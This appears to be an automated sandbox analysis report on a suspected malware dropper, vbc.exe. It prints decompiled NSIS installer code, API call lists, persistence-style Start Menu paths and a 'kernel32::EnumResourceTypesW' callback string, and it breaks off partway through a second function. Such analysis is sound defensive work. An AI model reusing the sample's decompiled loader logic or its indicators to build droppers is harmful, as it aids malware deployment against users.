60->72 63->23 67->51 74 403951-403959 68->74 75 4038d5-4038eb GetCurrentProcess OpenProcessToken 68->75 79 4037c3-4037d7 call 4058da lstrcatW 71->79 80 40375d-40376b call 405cce 71->80 76 40373c-403740 72->76 77 40395b 74->77 78 40395f-403963 ExitProcess 74->78 82 403921-40392f call 4065ec 75->82 83 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403742-403747 76->84 85 403749-40374d 76->85 77->78 94 4037e4-4037fe lstrcatW lstrcmpiW 79->94 95 4037d9-4037df lstrcatW 79->95 80->51 93 40376d-403783 call 406212 * 2 80->93 96 403931-40393b 82->96 97 40393d-403948 ExitWindowsEx 82->97 83->82 84->85 89 40374f 84->89 85->76 85->89 89->71 93->59 94->51 100 403800-403803 94->100 95->94 96->97 98 40394a-40394c call 40140b 96->98 97->74 97->98 98->74 104 403805-40380a call 405840 100->104 105 40380c call 4058bd 100->105 109 403811-40381f SetCurrentDirectoryW 104->109 105->109 112 403821-403827 call 406212 109->112 113 40382c-403855 call 406212 109->113 112->113 117 40385a-403876 call 406234 DeleteFileW 113->117 120 4038b7-4038bf 117->120 121 403878-403888 CopyFileW 117->121 120->117 122 4038c1-4038c8 call 4060b3 120->122 121->120 123 40388a-4038aa call 4060b3 call 406234 call 4058f2 121->123 122->51 123->120 132 4038ac-4038b3 CloseHandle 123->132 132->120
                                                C-Code - Quality: 82%
                                                			_entry_() {
                                                				intOrPtr _t54;
                                                				WCHAR* _t58;
                                                				char* _t61;
                                                				void* _t64;
                                                				void* _t66;
                                                				int _t68;
                                                				int _t70;
                                                				int _t73;
                                                				intOrPtr* _t74;
                                                				int _t75;
                                                				int _t77;
                                                				void* _t101;
                                                				signed int _t118;
                                                				void* _t121;
                                                				void* _t126;
                                                				intOrPtr _t145;
                                                				intOrPtr _t146;
                                                				intOrPtr* _t147;
                                                				int _t149;
                                                				void* _t152;
                                                				int _t153;
                                                				signed int _t157;
                                                				signed int _t162;
                                                				signed int _t167;
                                                				void* _t169;
                                                				void* _t171;
                                                				int* _t173;
                                                				signed int _t179;
                                                				signed int _t182;
                                                				CHAR* _t183;
                                                				WCHAR* _t184;
                                                				void* _t190;
                                                				char* _t191;
                                                				void* _t194;
                                                				void* _t195;
                                                				void* _t238;
                                                
                                                				_t169 = 0x20;
                                                				_t149 = 0;
                                                				 *(_t195 + 0x14) = 0;
                                                				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                				 *(_t195 + 0x1c) = 0;
                                                				SetErrorMode(0x8001); // executed
                                                				if(GetVersion() != 6) {
                                                					_t147 = E004065EC(0);
                                                					if(_t147 != 0) {
                                                						 *_t147(0xc00);
                                                					}
                                                				}
                                                				_t183 = "UXTHEME";
                                                				do {
                                                					E0040657C(_t183); // executed
                                                					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
                                                				} while ( *_t183 != 0);
                                                				E004065EC(9);
                                                				_t54 = E004065EC(7);
                                                				 *0x42a244 = _t54;
                                                				__imp__#17(_t190);
                                                				__imp__OleInitialize(_t149); // executed
                                                				 *0x42a2f8 = _t54;
                                                				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
                                                				E00406212(0x429240, L"NSIS Error");
                                                				_t58 = GetCommandLineW();
                                                				_t191 = L"\"C:\\Users\\Public\\vbc.exe\" ";
                                                				E00406212(_t191, _t58);
                                                				 *0x42a240 = GetModuleHandleW(_t149);
                                                				_t61 = _t191;
                                                				if(L"\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                                                					_t61 =  &M00435002;
                                                					_t169 = 0x22;
                                                				}
                                                				_t153 = CharNextW(E00405BF3(_t61, _t169));
                                                				 *(_t195 + 0x18) = _t153;
                                                				_t64 =  *_t153;
                                                				if(_t64 == _t149) {
                                                					L30:
                                                					_t184 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                					GetTempPathW(0x400, _t184);
                                                					_t66 = E00403419(_t153, 0);
                                                					_t220 = _t66;
                                                					if(_t66 != 0) {
                                                						L33:
                                                						DeleteFileW(L"1033");
                                                						_t68 = E00402ED5(_t222,  *(_t195 + 0x1c)); // executed
                                                						 *(_t195 + 0x10) = _t68;
                                                						if(_t68 != _t149) {
                                                							L45:
                                                							E00403969();
                                                							__imp__OleUninitialize();
                                                							_t234 =  *(_t195 + 0x10) - _t149;
                                                							if( *(_t195 + 0x10) == _t149) {
                                                								__eflags =  *0x42a2d4 - _t149;
                                                								if( *0x42a2d4 == _t149) {
                                                									L69:
                                                									_t70 =  *0x42a2ec;
                                                									__eflags = _t70 - 0xffffffff;
                                                									if(_t70 != 0xffffffff) {
                                                										 *(_t195 + 0x10) = _t70;
                                                									}
                                                									ExitProcess( *(_t195 + 0x10));
                                                								}
                                                								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
                                                								__eflags = _t73;
                                                								if(_t73 != 0) {
                                                									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
                                                									 *(_t195 + 0x34) = 1;
                                                									 *(_t195 + 0x40) = 2;
                                                									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
                                                								}
                                                								_t74 = E004065EC(4);
                                                								__eflags = _t74 - _t149;
                                                								if(_t74 == _t149) {
                                                									L67:
                                                									_t75 = ExitWindowsEx(2, 0x80040002);
                                                									__eflags = _t75;
                                                									if(_t75 != 0) {
                                                										goto L69;
                                                									}
                                                									goto L68;
                                                								} else {
                                                									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
                                                									__eflags = _t77;
                                                									if(_t77 == 0) {
                                                										L68:
                                                										E0040140B(9);
                                                										goto L69;
                                                									}
                                                									goto L67;
                                                								}
                                                							}
                                                							E00405957( *(_t195 + 0x10), 0x200010);
                                                							ExitProcess(2);
                                                						}
                                                						if( *0x42a25c == _t149) {
                                                							L44:
                                                							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
                                                							 *(_t195 + 0x14) = E00403A5B( *0x42a2ec);
                                                							goto L45;
                                                						}
                                                						_t173 = E00405BF3(_t191, _t149);
                                                						if(_t173 < _t191) {
                                                							L41:
                                                							_t231 = _t173 - _t191;
                                                							 *(_t195 + 0x10) = L"Error launching installer";
                                                							if(_t173 < _t191) {
                                                								_t171 = E004058DA(_t234);
                                                								lstrcatW(_t184, L"~nsu");
                                                								if(_t171 != _t149) {
                                                									lstrcatW(_t184, "A");
                                                								}
                                                								lstrcatW(_t184, L".tmp");
                                                								_t193 = L"C:\\Users\\Public";
                                                								if(lstrcmpiW(_t184, L"C:\\Users\\Public") != 0) {
                                                									_push(_t184);
                                                									if(_t171 == _t149) {
                                                										E004058BD();
                                                									} else {
                                                										E00405840();
                                                									}
                                                									SetCurrentDirectoryW(_t184);
                                                									_t238 = L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93" - _t149; // 0x43
                                                									if(_t238 == 0) {
                                                										E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t193);
                                                									}
                                                									E00406212(L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t195 + 0x18));
                                                									_t154 = "A" & 0x0000ffff;
                                                									L"51118080" = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                									_t194 = 0x1a;
                                                									do {
                                                										E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
                                                										DeleteFileW(0x420ee8);
                                                										if( *(_t195 + 0x10) != _t149 && CopyFileW(0x438800, 0x420ee8, 1) != 0) {
                                                											E004060B3(_t154, 0x420ee8, _t149);
                                                											E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
                                                											_t101 = E004058F2(0x420ee8);
                                                											if(_t101 != _t149) {
                                                												CloseHandle(_t101);
                                                												 *(_t195 + 0x10) = _t149;
                                                											}
                                                										}
                                                										L"51118080" =  &(L"51118080"[0]);
                                                										_t194 = _t194 - 1;
                                                									} while (_t194 != 0);
                                                									E004060B3(_t154, _t184, _t149);
                                                								}
                                                								goto L45;
                                                							}
                                                							 *_t173 = _t149;
                                                							_t174 =  &(_t173[2]);
                                                							if(E00405CCE(_t231,  &(_t173[2])) == 0) {
                                                								goto L45;
                                                							}
                                                							E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t174);
                                                							E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac", _t174);
                                                							 *(_t195 + 0x10) = _t149;
                                                							goto L44;
                                                						}
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                						while( *_t173 != _t157 || _t173[1] != _t118) {
                                                							_t173 = _t173;
                                                							if(_t173 >= _t191) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_t149 = 0;
                                                						goto L41;
                                                					}
                                                					GetWindowsDirectoryW(_t184, 0x3fb);
                                                					lstrcatW(_t184, L"\\Temp");
                                                					_t121 = E00403419(_t153, _t220);
                                                					_t221 = _t121;
                                                					if(_t121 != 0) {
                                                						goto L33;
                                                					}
                                                					GetTempPathW(0x3fc, _t184);
                                                					lstrcatW(_t184, L"Low");
                                                					SetEnvironmentVariableW(L"TEMP", _t184);
                                                					SetEnvironmentVariableW(L"TMP", _t184);
                                                					_t126 = E00403419(_t153, _t221);
                                                					_t222 = _t126;
                                                					if(_t126 == 0) {
                                                						goto L45;
                                                					}
                                                					goto L33;
                                                				} else {
                                                					goto L8;
                                                				}
                                                				do {
                                                					L8:
                                                					_t152 = 0x20;
                                                					if(_t64 != _t152) {
                                                						L10:
                                                						if( *_t153 == 0x22) {
                                                							_t153 = _t153 + 2;
                                                							_t152 = 0x22;
                                                						}
                                                						if( *_t153 != 0x2f) {
                                                							goto L24;
                                                						} else {
                                                							_t153 = _t153 + 2;
                                                							if( *_t153 == 0x53) {
                                                								_t146 =  *((intOrPtr*)(_t153 + 2));
                                                								if(_t146 == 0x20 || _t146 == 0) {
                                                									 *0x42a2e0 = 1;
                                                								}
                                                							}
                                                							asm("cdq");
                                                							asm("cdq");
                                                							_t167 = L"NCRC" & 0x0000ffff;
                                                							asm("cdq");
                                                							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
                                                							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
                                                								_t145 =  *((intOrPtr*)(_t153 + 8));
                                                								if(_t145 == 0x20 || _t145 == 0) {
                                                									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
                                                								}
                                                							}
                                                							asm("cdq");
                                                							asm("cdq");
                                                							_t162 = L" /D=" & 0x0000ffff;
                                                							asm("cdq");
                                                							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
                                                							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
                                                								goto L24;
                                                							} else {
                                                								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
                                                								__eflags = _t153;
                                                								E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t153);
                                                								L29:
                                                								_t149 = 0;
                                                								goto L30;
                                                							}
                                                						}
                                                					} else {
                                                						goto L9;
                                                					}
                                                					do {
                                                						L9:
                                                						_t153 = _t153 + 2;
                                                					} while ( *_t153 == _t152);
                                                					goto L10;
                                                					L24:
                                                					_t153 = E00405BF3(_t153, _t152);
                                                					if( *_t153 == 0x22) {
                                                						_t153 = _t153 + 2;
                                                					}
                                                					_t64 =  *_t153;
                                                				} while (_t64 != 0);
                                                				goto L29;
                                                			}







































                                                0x00403455
                                                0x00403456
                                                0x0040345d
                                                0x00403461
                                                0x00403469
                                                0x0040346d
                                                0x0040347d
                                                0x00403480
                                                0x00403487
                                                0x0040348e
                                                0x0040348e
                                                0x00403487
                                                0x00403490
                                                0x00403495
                                                0x00403496
                                                0x004034a2
                                                0x004034a6
                                                0x004034ae
                                                0x004034b5
                                                0x004034ba
                                                0x004034bf
                                                0x004034c6
                                                0x004034cc
                                                0x004034e2
                                                0x004034f2
                                                0x004034f7
                                                0x004034fd
                                                0x00403504
                                                0x00403518
                                                0x0040351d
                                                0x0040351f
                                                0x00403523
                                                0x00403528
                                                0x00403528
                                                0x00403537
                                                0x00403539
                                                0x0040353d
                                                0x00403543
                                                0x0040365a
                                                0x00403660
                                                0x0040366b
                                                0x0040366d
                                                0x00403672
                                                0x00403674
                                                0x004036cc
                                                0x004036d1
                                                0x004036db
                                                0x004036e2
                                                0x004036e6
                                                0x00403797
                                                0x00403797
                                                0x0040379c
                                                0x004037a2
                                                0x004037a7
                                                0x004038cd
                                                0x004038d3
                                                0x00403951
                                                0x00403951
                                                0x00403956
                                                0x00403959
                                                0x0040395b
                                                0x0040395b
                                                0x00403963
                                                0x00403963
                                                0x004038e3
                                                0x004038e9
                                                0x004038eb
                                                0x004038f8
                                                0x0040390b
                                                0x00403913
                                                0x0040391b
                                                0x0040391b
                                                0x00403923
                                                0x00403928
                                                0x0040392f
                                                0x0040393d
                                                0x00403940
                                                0x00403946
                                                0x00403948
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403931
                                                0x00403937
                                                0x00403939
                                                0x0040393b
                                                0x0040394a
                                                0x0040394c
                                                0x00000000
                                                0x0040394c
                                                0x00000000
                                                0x0040393b
                                                0x0040392f
                                                0x004037b6
                                                0x004037bd
                                                0x004037bd
                                                0x004036f2
                                                0x00403787
                                                0x00403787
                                                0x00403793
                                                0x00000000
                                                0x00403793
                                                0x004036ff
                                                0x00403703
                                                0x00403751
                                                0x00403751
                                                0x00403753
                                                0x0040375b
                                                0x004037ce
                                                0x004037d0
                                                0x004037d7
                                                0x004037df
                                                0x004037df
                                                0x004037ea
                                                0x004037ef
                                                0x004037fe
                                                0x00403802
                                                0x00403803
                                                0x0040380c
                                                0x00403805
                                                0x00403805
                                                0x00403805
                                                0x00403812
                                                0x00403818
                                                0x0040381f
                                                0x00403827
                                                0x00403827
                                                0x00403835
                                                0x00403841
                                                0x0040384f
                                                0x00403854
                                                0x0040385a
                                                0x00403866
                                                0x0040386c
                                                0x00403876
                                                0x0040388c
                                                0x0040389d
                                                0x004038a3
                                                0x004038aa
                                                0x004038ad
                                                0x004038b3
                                                0x004038b3
                                                0x004038aa
                                                0x004038b7
                                                0x004038be
                                                0x004038be
                                                0x004038c3
                                                0x004038c3
                                                0x00000000
                                                0x004037fe
                                                0x0040375d
                                                0x00403760
                                                0x0040376b
                                                0x00000000
                                                0x00000000
                                                0x00403773
                                                0x0040377e
                                                0x00403783
                                                0x00000000
                                                0x00403783
                                                0x0040370c
                                                0x00403724
                                                0x00403735
                                                0x00403736
                                                0x0040373a
                                                0x0040373c
                                                0x0040374a
                                                0x0040374d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040374d
                                                0x0040374f
                                                0x00000000
                                                0x0040374f
                                                0x0040367c
                                                0x00403688
                                                0x0040368d
                                                0x00403692
                                                0x00403694
                                                0x00000000
                                                0x00000000
                                                0x0040369c
                                                0x004036a4
                                                0x004036b5
                                                0x004036bd
                                                0x004036bf
                                                0x004036c4
                                                0x004036c6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403549
                                                0x00403549
                                                0x0040354b
                                                0x0040354f
                                                0x00403558
                                                0x0040355c
                                                0x00403561
                                                0x00403562
                                                0x00403562
                                                0x00403567
                                                0x00000000
                                                0x0040356d
                                                0x0040356e
                                                0x00403573
                                                0x00403575
                                                0x0040357d
                                                0x00403584
                                                0x00403584
                                                0x0040357d
                                                0x00403595
                                                0x004035a8
                                                0x004035a9
                                                0x004035be
                                                0x004035c3
                                                0x004035c7
                                                0x004035d0
                                                0x004035d8
                                                0x004035df
                                                0x004035df
                                                0x004035d8
                                                0x004035eb
                                                0x004035fe
                                                0x004035ff
                                                0x00403614
                                                0x0040361a
                                                0x0040361e
                                                0x00000000
                                                0x00403645
                                                0x00403645
                                                0x0040364a
                                                0x00403653
                                                0x00403658
                                                0x00403658
                                                0x00000000
                                                0x00403658
                                                0x0040361e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403551
                                                0x00403551
                                                0x00403552
                                                0x00403553
                                                0x00000000
                                                0x00403626
                                                0x0040362d
                                                0x00403633
                                                0x00403636
                                                0x00403636
                                                0x00403637
                                                0x0040363a
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040346D
                                                • GetVersion.KERNEL32 ref: 00403473
                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                • OleInitialize.OLE32(00000000), ref: 004034C6
                                                • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040350A
                                                • CharNextW.USER32(00000000), ref: 00403531
                                                  • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                  • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                • lstrcatW.KERNEL32 ref: 00403688
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369C
                                                • lstrcatW.KERNEL32 ref: 004036A4
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                • DeleteFileW.KERNEL32(1033), ref: 004036D1
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                • OleUninitialize.OLE32 ref: 0040379C
                                                • ExitProcess.KERNEL32 ref: 004037BD
                                                • lstrcatW.KERNEL32 ref: 004037D0
                                                • lstrcatW.KERNEL32 ref: 004037DF
                                                • lstrcatW.KERNEL32 ref: 004037EA
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,?), ref: 004037F6
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040386C
                                                • CopyFileW.KERNEL32 ref: 00403880
                                                • CloseHandle.KERNEL32(00000000), ref: 004038AD
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                • ExitProcess.KERNEL32 ref: 00403963
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                • String ID: "C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$C:\Users\Public$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu
                                                • API String ID: 2488574733-3709746910
                                                • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 133 404ced-404d39 GetDlgItem * 2 134 404f5a-404f61 133->134 135 404d3f-404dd3 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 133->135 136 404f63-404f73 134->136 137 404f75 134->137 138 404de2-404de9 DeleteObject 135->138 139 404dd5-404de0 SendMessageW 135->139 140 404f78-404f81 136->140 137->140 141 404deb-404df3 138->141 139->138 142 404f83-404f86 140->142 143 404f8c-404f92 140->143 144 404df5-404df8 141->144 145 404e1c-404e20 141->145 142->143 146 405070-405077 142->146 149 404fa1-404fa8 143->149 150 404f94-404f9b 143->150 147 404dfa 144->147 148 404dfd-404e1a call 406234 SendMessageW * 2 144->148 145->141 151 404e22-404e4e call 4042d6 * 2 145->151 153 4050e8-4050f0 146->153 154 405079-40507f 146->154 147->148 148->145 156 404faa-404fad 149->156 157 40501d-405020 149->157 150->146 150->149 189 404e54-404e5a 151->189 190 404f19-404f2c GetWindowLongW SetWindowLongW 151->190 162 4050f2-4050f8 SendMessageW 153->162 163 4050fa-405101 153->163 159 4052d0-4052e2 call 40433d 154->159 160 405085-40508f 154->160 165 404fb8-404fcd call 404c3b 156->165 166 404faf-404fb6 156->166 157->146 161 405022-40502c 157->161 160->159 169 405095-4050a4 SendMessageW 160->169 171 40503c-405046 161->171 172 40502e-40503a SendMessageW 161->172 162->163 173 405103-40510a 163->173 174 405135-40513c 163->174 165->157 188 404fcf-404fe0 165->188 166->157 166->165 169->159 181 4050aa-4050bb SendMessageW 169->181 171->146 183 405048-405052 171->183 172->171 175 405113-40511a 173->175 176 40510c-40510d ImageList_Destroy 173->176 179 405292-405299 174->179 180 405142-40514e call 4011ef 174->180 186 405123-40512f 175->186 187 40511c-40511d GlobalFree 175->187 176->175 179->159 194 40529b-4052a2 179->194 205 405150-405153 180->205 206 40515e-405161 180->206 192 4050c5-4050c7 181->192 193 4050bd-4050c3 181->193 184 405063-40506d 183->184 185 405054-405061 183->185 184->146 185->146 186->174 187->186 188->157 195 404fe2-404fe4 188->195 196 404e5d-404e64 189->196 200 404f32-404f36 190->200 198 4050c8-4050e1 call 401299 SendMessageW 192->198 193->192 193->198 194->159 199 4052a4-4052ce ShowWindow GetDlgItem ShowWindow 194->199 201 404fe6-404fed 195->201 202 404ff7 195->202 203 404efa-404f0d 196->203 204 404e6a-404e92 196->204 198->153 199->159 208 404f50-404f58 call 40430b 200->208 209 404f38-404f4b ShowWindow call 40430b 200->209 212 404ff3-404ff5 201->212 213 404fef-404ff1 201->213 216 404ffa-405016 call 40117d 202->216 203->196 220 404f13-404f17 203->220 214 404e94-404eca SendMessageW 204->214 215 404ecc-404ece 204->215 217 405155 205->217 218 405156-405159 call 404cbb 205->218 221 4051a2-4051c6 call 4011ef 206->221 222 405163-40517c call 4012e2 call 401299 206->222 208->134 209->159 212->216 213->216 214->203 226 404ed0-404edf SendMessageW 215->226 227 404ee1-404ef7 SendMessageW 215->227 216->157 217->218 218->206 220->190 220->200 235 405268-40527c InvalidateRect 221->235 236 4051cc 221->236 240 40518c-40519b SendMessageW 222->240 241 40517e-405184 222->241 226->203 227->203 235->179 238 40527e-40528d call 404c0e call 404bf6 235->238 239 4051cf-4051da 236->239 238->179 242 405250-405262 239->242 243 4051dc-4051eb 239->243 240->221 245 405186 241->245 246 405187-40518a 241->246 242->235 242->239 248 4051ed-4051fa 243->248 249 4051fe-405201 243->249 245->246 246->240 246->241 248->249 250 405203-405206 249->250 251 405208-405211 249->251 254 405216-40524e SendMessageW * 2 250->254 253 405213 251->253 251->254 253->254 254->242
                                                C-Code - Quality: 96%
                                                			E00404CED(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                				struct HWND__* _v8;
                                                				struct HWND__* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				signed char* _v28;
                                                				long _v32;
                                                				signed int _v40;
                                                				int _v44;
                                                				signed int* _v56;
                                                				signed char* _v60;
                                                				signed int _v64;
                                                				long _v68;
                                                				void* _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t192;
                                                				intOrPtr _t195;
                                                				long _t201;
                                                				signed int _t205;
                                                				signed int _t216;
                                                				void* _t219;
                                                				void* _t220;
                                                				int _t226;
                                                				signed int _t231;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t239;
                                                				signed int _t241;
                                                				signed char _t242;
                                                				signed char _t248;
                                                				void* _t252;
                                                				void* _t254;
                                                				signed char* _t270;
                                                				signed char _t271;
                                                				long _t273;
                                                				long _t276;
                                                				int _t282;
                                                				signed int _t283;
                                                				long _t284;
                                                				signed int _t287;
                                                				signed int _t294;
                                                				signed char* _t302;
                                                				struct HWND__* _t306;
                                                				int _t307;
                                                				signed int* _t308;
                                                				int _t309;
                                                				long _t310;
                                                				signed int _t311;
                                                				void* _t313;
                                                				long _t314;
                                                				int _t315;
                                                				signed int _t316;
                                                				void* _t318;
                                                
                                                				_t306 = _a4;
                                                				_v12 = GetDlgItem(_t306, 0x3f9);
                                                				_v8 = GetDlgItem(_t306, 0x408);
                                                				_t318 = SendMessageW;
                                                				_v20 =  *0x42a268;
                                                				_t282 = 0;
                                                				_v24 =  *0x42a250 + 0x94;
                                                				if(_a8 != 0x110) {
                                                					L23:
                                                					if(_a8 != 0x405) {
                                                						_t285 = _a16;
                                                					} else {
                                                						_a12 = _t282;
                                                						_t285 = 1;
                                                						_a8 = 0x40f;
                                                						_a16 = 1;
                                                					}
                                                					if(_a8 == 0x4e || _a8 == 0x413) {
                                                						_v16 = _t285;
                                                						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                							if(( *0x42a259 & 0x00000002) != 0) {
                                                								L41:
                                                								if(_v16 != _t282) {
                                                									_t231 = _v16;
                                                									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
                                                									}
                                                									_t232 = _v16;
                                                									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                										_t285 = _v20;
                                                										_t233 =  *(_t232 + 0x5c);
                                                										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                										} else {
                                                											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                										}
                                                									}
